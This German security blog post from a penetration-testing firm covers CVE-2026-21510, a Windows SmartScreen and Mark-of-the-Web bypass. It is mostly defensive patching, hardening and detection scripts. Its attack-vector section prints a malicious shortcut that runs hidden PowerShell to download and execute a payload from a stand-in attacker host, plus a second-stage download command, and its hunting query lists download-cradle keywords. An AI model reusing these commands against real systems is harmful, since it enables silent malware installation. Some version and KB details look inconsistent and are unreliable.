CVE-2026-21510: Kritische Zero-Day Windows SmartScreen Bypass in freier Wildbahn ausgenutzt

Diese Woche in unserer InSEKurity of the Week Serie: Eine kritische Zero-Day-Schwachstelle in Windows Shell, die aktiv in freier Wildbahn ausgenutzt wurde und es Angreifern ermöglicht, Windows SmartScreen- und Mark-of-the-Web-Sicherheitsmechanismen mit einem einzigen böswilligen Klick zu umgehen.

🚨 Zusammenfassung

CVE-ID: CVE-2026-21510
EUVD-ID: EUVD-2026-5682
CVSS 3.1 Score: 8.8 (High)
CWE: CWE-693 (Protection Mechanism Failure)
Betroffene Software: Alle derzeit unterstützten Windows-Versionen (10, 11, Server)
Angriffsvektor: Netzwerk (Unauthenticated Remote Attack)
Authentifizierung erforderlich: Keine
Nutzerinteraktion: Erforderlich (Einzelner Klick)
Auswirkung: Security Feature Bypass, Malware-Ausführung ohne Warnungen
Patch-Status: ✅ Verfügbar (Februar 2026 Patch Tuesday)
Veröffentlichung: 10. Februar 2026
Exploit-Status: ⚠️ Zero-Day - Aktiv in freier Wildbahn ausgenutzt
CISA KEV Frist: 3. März 2026

📞 Was ist Windows SmartScreen?

Windows SmartScreen ist eine kritische Sicherheitsfunktion, die in Windows-Betriebssysteme integriert ist und Benutzer vor potenziell schädlichen Inhalten schützt, die aus dem Internet heruntergeladen werden. Sie arbeitet zusammen mit Mark of the Web (MoTW), das Dateien aus nicht vertrauenswürdigen Quellen markiert.

Diese Sicherheitsmechanismen sind darauf ausgelegt:

Warndialoge für nicht erkannte Anwendungen anzuzeigen
Bekannte schädliche Dateien und Websites zu blockieren
Die Ausführung potenziell gefährlicher Inhalte zu verhindern
Benutzer vor Phishing-Angriffen und Drive-by-Downloads zu schützen
Digitale Signaturen heruntergeladener Anwendungen zu überprüfen

SmartScreen ist integriert in:

Windows Shell: Datei-Explorer und Ausführungshandling
Microsoft Edge: Web-Browsing-Schutz
Outlook: E-Mail-Anhang-Scanning
Microsoft Store: App-Verifizierung

Mit Milliarden von Windows-Nutzern weltweit stellt jede Umgehung dieser Schutzmaßnahmen eine enorme Angriffsfläche für Bedrohungsakteure dar.

🔍 Technische Analyse

Beschreibung der Schwachstelle

CVE-2026-21510 ist eine Protection Mechanism Failure-Schwachstelle, die es Angreifern ermöglicht, Windows SmartScreen- und Mark-of-the-Web (MoTW)-Warnungen vollständig zu umgehen, wenn Opfer mit böswilligen Links oder Verknüpfungsdateien interagieren.

Die Schwachstelle nutzt einen Logic Flaw in der Windows Shell aus, die Dateiausführung und Sicherheitszonenprüfungen behandelt. Wenn eine speziell präparierte Link- oder .lnk-Verknüpfungsdatei geöffnet wird, zeigt Windows die Sicherheitswarnungen nicht an, die Benutzer normalerweise auf potenziell gefährliche Inhalte aus dem Internet hinweisen würden.

Ursachenanalyse

Das Problem stammt aus mehreren kritischen Fehlern in der Sicherheitsarchitektur der Windows Shell:

Unsachgemäße Zone Identifier-Behandlung: Windows Shell verarbeitet den Zone.Identifier Alternate Data Stream (ADS), der Dateien aus nicht vertrauenswürdigen Quellen markiert, nicht korrekt
Fehlende Sicherheitskontext-Validierung: Die Shell validiert den Sicherheitskontext bei der Behandlung bestimmter Dateitypen und URL-Protokolle nicht ordnungsgemäß
Umgehung von MoTW-Prüfungen: Speziell präparierte Verknüpfungen können den Mark-of-the-Web-Verifizierungsprozess umgehen
Stiller Ausführungspfad: Es existiert ein Code-Pfad, über den Dateien ohne Auslösung von SmartScreen-Prompts ausgeführt werden können
Unzureichende Eingabevalidierung: URL- und Verknüpfungsparameter werden vor der Verarbeitung nicht ausreichend bereinigt

Angriffsvektor

Ein typisches Ausnutzungsszenario verläuft wie folgt:

# Schritt 1: Angreifer erstellt eine böswillige .lnk-Verknüpfungsdatei
# Die Verknüpfung nutzt die Windows Shell-Schwachstelle aus

# Beispiel böswillige Verknüpfungseigenschaften:
Target: C:\Windows\System32\cmd.exe
Arguments: /c powershell -WindowStyle Hidden -Command "IEX(New-Object Net.WebClient).DownloadString('http://attacker.evil.com/payload.ps1')"

# Schritt 2: Angreifer verteilt die Verknüpfung via Phishing
# Häufige Verteilungsmethoden:
# - E-Mail-Anhänge (ZIP-Archive umgehen einige Filter)
# - Böswillige Websites (Drive-by-Downloads)
# - Cloud-Storage-Links (OneDrive, Dropbox, Google Drive)
# - USB-Sticks (physisches Social Engineering)

# Schritt 3: Opfer öffnet die Datei
# ERWARTETES Verhalten: SmartScreen-Warnung erscheint
# TATSÄCHLICHES Verhalten: SmartScreen wird umgangen, Datei wird still ausgeführt

# Schritt 4: Malware lädt herunter und führt aus
# Ohne Bewusstsein oder Sicherheitswarnungen des Benutzers

# Schritt 5: Angreifer erlangt initialen Zugriff
# Lädt zusätzliche Payloads herunter:
wget http://attacker.evil.com/stage2.exe -OutFile $env:TEMP\update.exe
Start-Process $env:TEMP\update.exe -WindowStyle Hidden

Konkrete Ausnutzungsszenarien:

Phishing-Kampagnen: Massen-E-Mail-Verteilung von “invoice.pdf.lnk” oder “document.zip” mit böswilligen Verknüpfungen
Watering-Hole-Angriffe: Kompromittierte Websites, die automatisch böswillige Verknüpfungen beim Besuch herunterladen
Drive-by-Downloads: Browser-Exploits kombiniert mit CVE-2026-21510 für stille Malware-Installation
Social Engineering: Angreifer, die sich als IT-Support ausgeben und “Sicherheitsupdate”-Verknüpfungen senden
USB-Drops: Physische Angriffe, bei denen infizierte USB-Sticks auf Parkplätzen oder in Büros hinterlassen werden
Supply-Chain-Angriffe: Einschleusen böswilliger Verknüpfungen in Software-Installer oder Update-Pakete

Auswirkungen

Nach erfolgreicher Ausnutzung können Angreifer:

Sicherheitskontrollen umgehen: Malware ohne jegliche Sicherheitswarnungen ausführen
Ransomware installieren: Dateiverschlüsselungs-Malware still installieren
C2-Brückenkopf etablieren: Command-and-Control-Agenten installieren
Credentials stehlen: Keylogger und Info-Stealer einsetzen
Lateral Movement: Kompromittiertes System als Pivot-Punkt verwenden
Erkennung umgehen: Endpoint-Schutz umgehen, der auf Benutzerinteraktion basiert

⚠️ Folgenabschätzung

Unmittelbare Auswirkung

Zero-Day-Ausnutzung: Bestätigte aktive Ausnutzung in freier Wildbahn vor Patch-Verfügbarkeit
1-Click-Angriff: Erfordert nur einen einzelnen Benutzerklick auf böswilligen Inhalt
Keine visuelle Warnung: Benutzer sehen keine SmartScreen-Warnungen oder Sicherheitsdialoge
Umgeht EDR: Viele Endpoint-Detection-Systeme verlassen sich auf SmartScreen als erste Verteidigungslinie
Massen-Ausnutzungspotenzial: Leicht skalierbar durch Phishing-Kampagnen

Betroffene Umgebungen

Besonders gefährdet sind:

Unternehmens-Workstations: Alle Windows 10- und 11-Corporate-Deployments
Windows Server: Server 2012, 2016, 2019, 2022, 2025-Installationen
Regierungsbehörden: Hochwertige Ziele für APT-Gruppen
Gesundheitsorganisationen: HIPAA-regulierte Umgebungen mit Patientendaten
Finanzinstitute: Banksysteme und Trading-Plattformen
Remote-Arbeiter: Home-Office-Umgebungen mit reduziertem Sicherheitsmonitoring
Kritische Infrastruktur: SCADA- und OT-Systeme, die Windows ausführen

Betroffene Versionen

Microsoft bestätigte, dass die Schwachstelle folgende Versionen betrifft:

Windows 10: Versionen 1607, 1809, 21H2, 22H2
Windows 11: Versionen 22H3, 23H2, 24H2, 25H2, 26H1
Windows Server: 2012, 2016, 2019, 2022, 2025

ALLE derzeit unterstützten Windows-Versionen sind anfällig.

Angreiferprofile

Diese Schwachstelle ist hochattraktiv für:

Ransomware-Betreiber: Initialer Zugriff für Dateiverschlüsselungsangriffe
APT-Gruppen: Nationalstaatliche Akteure, die Regierungen und Unternehmen angreifen
Cyberkriminelle Banden: Massen-Credential-Harvesting und Banking-Trojaner
Malware-as-a-Service: Exploit integriert in kommerzielle Malware-Plattformen
Phishing-Spezialisten: Erhöhte Erfolgsraten für Social-Engineering-Kampagnen

🛡️ Mitigationsstrategien

Sofortmaßnahmen (Priorität 1) ⚡

Installieren Sie Februar 2026 Sicherheitsupdates SOFORT:

# Methode 1: Windows Update GUI
# Einstellungen > Update & Sicherheit > Windows Update > Nach Updates suchen

# Methode 2: PowerShell (Als Administrator ausführen)
Install-Module PSWindowsUpdate -Force
Get-WindowsUpdate
Install-WindowsUpdate -AcceptAll -AutoReboot

# Methode 3: Eingabeaufforderung (Enterprise - WSUS)
wuauclt /detectnow /updatenow

# Methode 4: Patch-Installation überprüfen
# Nach Februar 2026 Sicherheitsupdates suchen
Get-HotFix | Where-Object {$_.InstalledOn -gt "2026-02-09"} | Select-Object HotFixID, Description, InstalledOn

# Windows 10 Update KB-Nummern (Februar 2026):
# - Windows 10 22H2: KB5034877
# - Windows 10 21H2: KB5034876

# Windows 11 Update KB-Nummern (Februar 2026):
# - Windows 11 24H2: KB5034880
# - Windows 11 23H2: KB5034879

Erweiterte SmartScreen-Einstellungen aktivieren:

# SmartScreen auf maximalen Schutz setzen
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" -Name "SmartScreenEnabled" -Value "Block"

# SmartScreen für Microsoft Edge aktivieren
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Edge" -Name "SmartScreenEnabled" -Value 1

# Potenziell unerwünschte Anwendungen (PUA) blockieren
Set-MpPreference -PUAProtection Enabled

# Windows Shell neu starten, um Änderungen anzuwenden
Stop-Process -Name explorer -Force

Ereignisprotokolle auf Kompromittierungsindikatoren prüfen:

# Nach verdächtigen Verknüpfungsausführungen suchen
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Shell-Core/Operational'; StartTime=(Get-Date).AddDays(-30)} |
  Where-Object {$_.Message -match "lnk|shortcut"} |
  Select-Object TimeCreated, Message | Format-List

# Nach SmartScreen-Umgehungen suchen
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-SmartScreen/Debug'; ID=1; StartTime=(Get-Date).AddDays(-30)} |
  Select-Object TimeCreated, Message | Format-List

# Nach verdächtigen Downloads suchen
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Windows Defender/Operational'; ID=1116,1117} -MaxEvents 1000 |
  Where-Object {$_.TimeCreated -gt (Get-Date).AddDays(-30)}

Application Control-Richtlinien implementieren:

# Windows Defender Application Control (WDAC) - Enterprise
# Baseline-Richtlinie erstellen, um nur vertrauenswürdige Anwendungen zuzulassen

# Methode 1: Windows Defender Application Control aktivieren
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Application Guard" -Name "AllowAppGuard" -Value 1

# Methode 2: AppLocker-Regeln (Als Administrator ausführen)
# Ausführung von benutzerschreibbaren Orten blockieren
New-AppLockerPolicy -RuleType Executable,Script -User Everyone -Optimization -Xml |
  Set-AppLockerPolicy -Merge

# Methode 3: Software Restriction Policies (SRP)
# Ausführung aus Downloads- und Temp-Ordnern verhindern

Erkennungsmaßnahmen 🔍

Indikatoren für Kompromittierung (IoCs):

# Nach verdächtigen .lnk-Dateien an häufigen Orten scannen
Get-ChildItem -Path "$env:USERPROFILE\Downloads","$env:USERPROFILE\Desktop","$env:TEMP" -Filter *.lnk -Recurse -ErrorAction SilentlyContinue |
  ForEach-Object {
    $shell = New-Object -ComObject WScript.Shell
    $shortcut = $shell.CreateShortcut($_.FullName)
    if ($shortcut.TargetPath -match "cmd\.exe|powershell|wscript|cscript|mshta") {
      Write-Host "⚠️ VERDÄCHTIG: $($_.FullName)" -ForegroundColor Red
      Write-Host "   Target: $($shortcut.TargetPath)" -ForegroundColor Yellow
      Write-Host "   Arguments: $($shortcut.Arguments)" -ForegroundColor Yellow
    }
  }

# Nach Dateien ohne Zone.Identifier (Mark of the Web) suchen
Get-ChildItem -Path "$env:USERPROFILE\Downloads" -File -Recurse -ErrorAction SilentlyContinue |
  Where-Object {-not (Get-Content -Path "$($_.FullName):Zone.Identifier" -ErrorAction SilentlyContinue)} |
  Where-Object {$_.Extension -match "\.(exe|dll|lnk|scr|vbs|js|hta)$"} |
  Select-Object FullName, CreationTime, LastWriteTime

# Netzwerkverbindungen von verdächtigen Prozessen überwachen
Get-NetTCPConnection | Where-Object {$_.OwningProcess -ne 0} |
  ForEach-Object {
    $process = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
    if ($process.Path -match "\\Temp\\|\\Downloads\\|\\AppData\\Local\\") {
      Write-Host "⚠️ Verdächtige Verbindung von: $($process.Path)" -ForegroundColor Red
      Write-Host "   Remote: $($_.RemoteAddress):$($_.RemotePort)" -ForegroundColor Yellow
    }
  }

SIEM-Regeln und Detektionen:

Event ID 1116/1117: Windows Defender Malware-Erkennung
Event ID 8: SmartScreen Dateiausführungswarnungen (Abwesenheit deutet auf Umgehung hin)
Event ID 4688: Prozesserstellung von ungewöhnlichen Orten (Downloads, Temp)
Netzwerk-Anomalien: Unerwartete ausgehende Verbindungen von Shell-Prozessen
Dateierstellungsüberwachung: Neue ausführbare Dateien in benutzerschreibbaren Verzeichnissen

Threat Hunting Queries:

// Microsoft Defender for Endpoint KQL Query
DeviceProcessEvents
| where ProcessCommandLine has_any ("powershell", "cmd.exe", "wscript", "mshta")
| where InitiatingProcessFileName =~ "explorer.exe"
| where ProcessCommandLine has_any ("DownloadString", "DownloadFile", "Invoke-WebRequest", "IEX", "iwr")
| where Timestamp > ago(30d)
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessCommandLine
| order by Timestamp desc

Langfristige Sicherheitsverbesserungen

Attack Surface Reduction (ASR)-Regeln:

# Ausführung von potenziell verschleierten Skripten blockieren
Add-MpPreference -AttackSurfaceReductionRules_Ids 5BEB7EFE-FD9A-4556-801D-275E5FFC04CC -AttackSurfaceReductionRules_Actions Enabled

# Ausführbare Dateien blockieren, es sei denn, sie erfüllen Prävalenz-, Alters- oder Trusted-List-Kriterien
Add-MpPreference -AttackSurfaceReductionRules_Ids 01443614-cd74-433a-b99e-2ecdc07bfc25 -AttackSurfaceReductionRules_Actions Enabled

# Office-Anwendungen daran hindern, ausführbare Inhalte zu erstellen
Add-MpPreference -AttackSurfaceReductionRules_Ids 3B576869-A4EC-4529-8536-B80A7769E899 -AttackSurfaceReductionRules_Actions Enabled

Erweiterte E-Mail-Sicherheit: E-Mail-Gateway-Regeln implementieren, um ZIP/RAR-Archive mit .lnk-Dateien zu blockieren oder in Quarantäne zu stellen
Benutzer-Awareness-Training: Benutzer über die Risiken des Öffnens von Dateien aus nicht vertrauenswürdigen Quellen aufklären, auch wenn keine Sicherheitswarnungen erscheinen
Netzwerksegmentierung: Lateral-Movement-Möglichkeiten durch ordnungsgemäße Netzwerkzonierung begrenzen
Endpoint Detection and Response (EDR): Erweiterte EDR-Lösungen einsetzen, die Verhaltensindi.katoren überwachen, nicht nur Benutzerklick-Warnungen
Controlled Folder Access: Windows Defender Ransomware-Schutz aktivieren
```
Set-MpPreference -EnableControlledFolderAccess Enabled
```

🎯 Warum ist dies kritisch?

Zero-Day-Ausnutzung: Schwachstelle wurde aktiv ausgenutzt, bevor Patches verfügbar waren
CISA KEV-Listung: Zu Known Exploited Vulnerabilities Katalog hinzugefügt - Bundesbehörden müssen bis 3. März 2026 patchen
Universelle Windows-Auswirkung: Alle unterstützten Windows-Versionen betroffen (Milliarden von Geräten)
Umgeht Kernsicherheit: SmartScreen ist eine fundamentale Schutzschicht, auf die sich Benutzer und Sicherheitstools verlassen
Niedrige Angriffskomplexität: Erfordert nur eine böswillige Datei und Social Engineering - keine fortgeschrittene Ausnutzung nötig
Keine Benutzerwarnung: Opfer haben keine Anzeichen dafür, dass sie böswillige Inhalte ausführen
Massen-Ausnutzungspotenzial: Leicht skalierbar durch Phishing-Kampagnen und Watering-Hole-Angriffe
APT-Kampagnen-Vektor: Ideal für gezielte Angriffe gegen hochwertige Organisationen

📊 Betroffene Versionen und Erkennung

Anfällige Versionen

Windows 10:
- Version 22H2 (Build 19045)
- Version 21H2 (Build 19044)
- Version 1809 (Build 17763) - LTSC
- Version 1607 (Build 14393) - LTSC
Windows 11:
- Version 26H1 (Build 26100) - Insider
- Version 25H2 (Build 25000) - Insider
- Version 24H2 (Build 26100)
- Version 23H2 (Build 22631)
- Version 22H3 (Build 22621)
Windows Server:
- Windows Server 2025
- Windows Server 2022
- Windows Server 2019
- Windows Server 2016
- Windows Server 2012 / 2012 R2
Sicher nach Patching: Systeme mit installierten Sicherheitsupdates vom Februar 2026 oder später

Automatische Erkennung

#!/usr/bin/env powershell
# Schwachstellen-Scanner für CVE-2026-21510
# Prüft, ob Windows-Systeme gegen SmartScreen-Bypass gepatcht sind

Write-Host "`n=== CVE-2026-21510 Schwachstellen-Scanner ===" -ForegroundColor Cyan
Write-Host "Scanning auf Windows SmartScreen Bypass-Schwachstelle`n" -ForegroundColor Cyan

# Windows-Version abrufen
$osInfo = Get-CimInstance Win32_OperatingSystem
$osVersion = $osInfo.Caption
$osBuild = $osInfo.BuildNumber

Write-Host "Betriebssystem: $osVersion" -ForegroundColor Yellow
Write-Host "Build-Nummer: $osBuild`n" -ForegroundColor Yellow

# Nach Februar 2026 Sicherheitsupdates suchen
$febUpdates = Get-HotFix | Where-Object {
    $_.InstalledOn -gt "2026-02-09" -and
    $_.Description -match "Security Update"
}

# Erforderliche KB-Nummern pro OS-Version definieren
$requiredKBs = @{
    "Windows 10 Version 22H2" = "KB5034877"
    "Windows 10 Version 21H2" = "KB5034876"
    "Windows 11 Version 24H2" = "KB5034880"
    "Windows 11 Version 23H2" = "KB5034879"
}

if ($febUpdates) {
    Write-Host "✅ GEPATCHT: Februar 2026 Sicherheitsupdates erkannt" -ForegroundColor Green
    Write-Host "`nInstallierte Sicherheitsupdates:" -ForegroundColor Green
    $febUpdates | Select-Object HotFixID, Description, InstalledOn | Format-Table -AutoSize
} else {
    Write-Host "⚠️  ANFÄLLIG: Keine Februar 2026 Sicherheitsupdates gefunden" -ForegroundColor Red
    Write-Host "AKTION ERFORDERLICH: Windows-Updates sofort installieren" -ForegroundColor Red
    Write-Host "`nCISA KEV Sanierungsfrist: 3. März 2026" -ForegroundColor Yellow
}

# SmartScreen-Status prüfen
$smartScreenStatus = Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" -Name "SmartScreenEnabled" -ErrorAction SilentlyContinue

Write-Host "`nSmartScreen-Status:" -ForegroundColor Cyan
if ($smartScreenStatus.SmartScreenEnabled -eq "Block") {
    Write-Host "✅ SmartScreen: Aktiviert (Maximaler Schutz)" -ForegroundColor Green
} elseif ($smartScreenStatus.SmartScreenEnabled -eq "Warn") {
    Write-Host "⚠️  SmartScreen: Aktiviert (Warnmodus)" -ForegroundColor Yellow
} else {
    Write-Host "❌ SmartScreen: Deaktiviert oder Unbekannt" -ForegroundColor Red
}

# Windows Defender-Status prüfen
$defenderStatus = Get-MpComputerStatus

Write-Host "`nWindows Defender-Status:" -ForegroundColor Cyan
Write-Host "Antivirus aktiviert: $($defenderStatus.AntivirusEnabled)" -ForegroundColor $(if($defenderStatus.AntivirusEnabled){"Green"}else{"Red"})
Write-Host "Echtzeitschutz: $($defenderStatus.RealTimeProtectionEnabled)" -ForegroundColor $(if($defenderStatus.RealTimeProtectionEnabled){"Green"}else{"Red"})
Write-Host "PUA-Schutz: $($defenderStatus.PUAProtection)" -ForegroundColor $(if($defenderStatus.PUAProtection -eq 1){"Green"}else{"Yellow"})

Write-Host "`n=== Scan abgeschlossen ===`n" -ForegroundColor Cyan

🚀 Timeline und Disclosure

Entdeckungsdatum: Unbekannt (Zero-Day)
Aktive Ausnutzung: Bestätigt vor Patch-Verfügbarkeit
CVE-Zuweisung: CVE-2026-21510
Patch-Freigabe: 10. Februar 2026 (Februar 2026 Patch Tuesday)
Öffentliche Offenlegung: 10. Februar 2026
CISA KEV-Hinzufügung: 11. Februar 2026
Bundesbehörden-Frist: 3. März 2026
Microsoft-Advisory: Februar 2026 Security Update Guide

🔗 Ressourcen und Referenzen

CVE: CVE-2026-21510
CWE: CWE-693: Protection Mechanism Failure
Microsoft Security Update Guide: CVE-2026-21510 Advisory
CISA KEV Catalog: Known Exploited Vulnerabilities
NVD: CVE-2026-21510 Details

💼 SEKurity Unterstützt Sie

Diese Zero-Day-Schwachstelle demonstriert, warum zeitnahes Patching und Defense-in-Depth-Strategien kritisch sind. Ein einzelnes ungepatchtes System kann zum Einstiegspunkt für eine verheerende Sicherheitsverletzung werden.

Unsere Dienstleistungen

Penetrationstests: Webapplikationen, Mobile Apps (Android & iOS), SAP-Systeme, Active Directory
Großangelegte Angriffe: Perimetertests, IT-Infrastrukturtests, Red Team Engagements
Security Awareness: Phishing-Kampagnen, Hacking-Demonstrationen, Social-Engineering-Training

Handeln Sie jetzt – bevor es Angreifer tun.

Kontakt:

🌐 Website: www.sekurity.de

📧 Anfragen: www.sekurity.de/kontakt

📱 LinkedIn: SEKurity GmbH

Ihr SEKurity Team – Your Trusted Adversaries

Ihre Windows-Sicherheit ist unser Antrieb.

InSEKurity of the Week (CW07/2026): Windows Shell SmartScreen Bypass Zero-Day (CVE-2026-21510)